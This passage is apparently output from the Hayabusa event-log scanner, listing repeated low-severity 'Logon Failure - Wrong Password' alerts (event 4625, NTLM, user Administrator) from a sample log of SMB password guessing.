NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: 
